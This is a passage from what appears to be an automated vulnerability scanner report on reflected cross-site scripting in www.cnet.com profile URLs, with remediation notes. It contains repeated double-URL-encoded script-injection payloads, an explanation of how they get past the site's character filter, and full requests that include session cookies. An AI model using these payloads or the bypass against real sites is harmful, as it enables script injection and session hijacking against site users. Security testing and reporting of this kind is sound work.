Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:03 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:03 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="raygun01abe22"><script>alert(1)</script>1f866ca59f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afed3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94da697379d was submitted in the REST URL parameter 2. This input was echoed as afed3"><script>alert(1)</script>94da697379d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhapsodyartistafed3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94da697379d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:11:14 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:11:14 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=961
Connection: Keep-Alive
Content-Length: 31182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rhapsodyartistafed3"><script>alert(1)</script>94da697379d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ce1f%253cscript%253ealert%25281%2529%253c%252fscript%253e7331cad2a85 was submitted in the REST URL parameter 2. This input was echoed as 7ce1f<script>alert(1)</script>7331cad2a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhapsodyartist7ce1f%253cscript%253ealert%25281%2529%253c%252fscript%253e7331cad2a85/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:11:15 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:11:16 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=980
Connection: Keep-Alive
Content-Length: 31188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rhapsodyartist7ce1f<script>alert(1)</script>7331cad2a85's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60c21ad9 was submitted in the REST URL parameter 2. This input was echoed as 16bb6"><script>alert(1)</script>b60c21ad9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhbrown16bb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60c21ad9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:37 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:37 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=988
Connection: Keep-Alive
Content-Length: 31048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rhbrown16bb6"><script>alert(1)</script>b60c21ad9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c8f8%253cscript%253ealert%25281%2529%253c%252fscript%253e5888331ce3d was submitted in the REST URL parameter 2. This input was echoed as 6c8f8<script>alert(1)</script>5888331ce3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhbrown6c8f8%253cscript%253ealert%25281%2529%253c%252fscript%253e5888331ce3d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:38 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:38 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=958
Connection: Keep-Alive
Content-Length: 31027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rhbrown6c8f8<script>alert(1)</script>5888331ce3d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 666b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b6a89eab92 was submitted in the REST URL parameter 2. This input was echoed as 666b3"><script>alert(1)</script>9b6a89eab92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rickbroida666b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b6a89eab92/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:16:13 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:16:14 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31081
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rickbroida666b3"><script>alert(1)</script>9b6a89eab92"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1d06%253cscript%253ealert%25281%2529%253c%252fscript%253e2be8ea29256 was submitted in the REST URL parameter 2. This input was echoed as a1d06<script>alert(1)</script>2be8ea29256 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rickbroidaa1d06%253cscript%253ealert%25281%2529%253c%252fscript%253e2be8ea29256/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:16:15 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:16:15 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rickbroidaa1d06<script>alert(1)</script>2be8ea29256's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ed4b%253cscript%253ealert%25281%2529%253c%252fscript%253e0a507c72146 was submitted in the REST URL parameter 2. This input was echoed as 6ed4b<script>alert(1)</script>0a507c72146 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ronsgal16ed4b%253cscript%253ealert%25281%2529%253c%252fscript%253e0a507c72146/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:26 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:26 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=957
Connection: Keep-Alive
Content-Length: 31028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ronsgal16ed4b<script>alert(1)</script>0a507c72146's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5962%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea799e949b23 was submitted in the REST URL parameter 2. This input was echoed as f5962"><script>alert(1)</script>a799e949b23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ronsgal1f5962%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea799e949b23/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:24 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:24 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=966
Connection: Keep-Alive
Content-Length: 31068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ronsgal1f5962"><script>alert(1)</script>a799e949b23"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0f92da961c was submitted in the REST URL parameter 2. This input was echoed as 28a93"><script>alert(1)</script>c0f92da961c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sandonet28a93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0f92da961c/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:13 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:13 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=975
Connection: Keep-Alive
Content-Length: 31108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="sandonet28a93"><script>alert(1)</script>c0f92da961c"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0653%253cscript%253ealert%25281%2529%253c%252fscript%253ee6776729ce2 was submitted in the REST URL parameter 2. This input was echoed as b0653<script>alert(1)</script>e6776729ce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sandonetb0653%253cscript%253ealert%25281%2529%253c%252fscript%253ee6776729ce2/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:14 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:14 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=969
Connection: Keep-Alive
Content-Length: 31073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>sandonetb0653<script>alert(1)</script>e6776729ce2's community profile</li>
...[SNIP]...
